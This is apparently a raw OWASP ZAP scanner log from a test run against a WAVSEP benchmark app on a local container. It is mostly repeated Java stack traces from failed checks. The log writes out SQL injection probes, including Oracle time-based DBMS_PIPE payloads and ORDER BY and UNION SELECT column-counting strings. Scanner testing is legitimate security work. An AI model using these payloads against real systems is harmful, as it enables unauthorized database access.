org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682174 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 2512=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(103)||CHR(77)||CHR(70),5) AND ('afCU'='afCU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 2512=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(103)||CHR(77)||CHR(70),5) AND ('afCU'='afCU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682175 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 5145-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 5145-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682176 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 3323=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(90)||CHR(90)||CHR(73),5) AND 'AMgH'='AMgH] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 3323=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(90)||CHR(90)||CHR(73),5) AND 'AMgH'='AMgH at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682177 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 1460=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(86)||CHR(114)||CHR(83),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 1460=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(86)||CHR(114)||CHR(83),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682178 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682178 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7402=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(98)||CHR(85)||CHR(121),5)-- Ocbu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7402=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(98)||CHR(85)||CHR(121),5)-- Ocbu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682180 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682180 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682181 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682182 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 2568-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 2568-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682183 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682183 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682184 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at 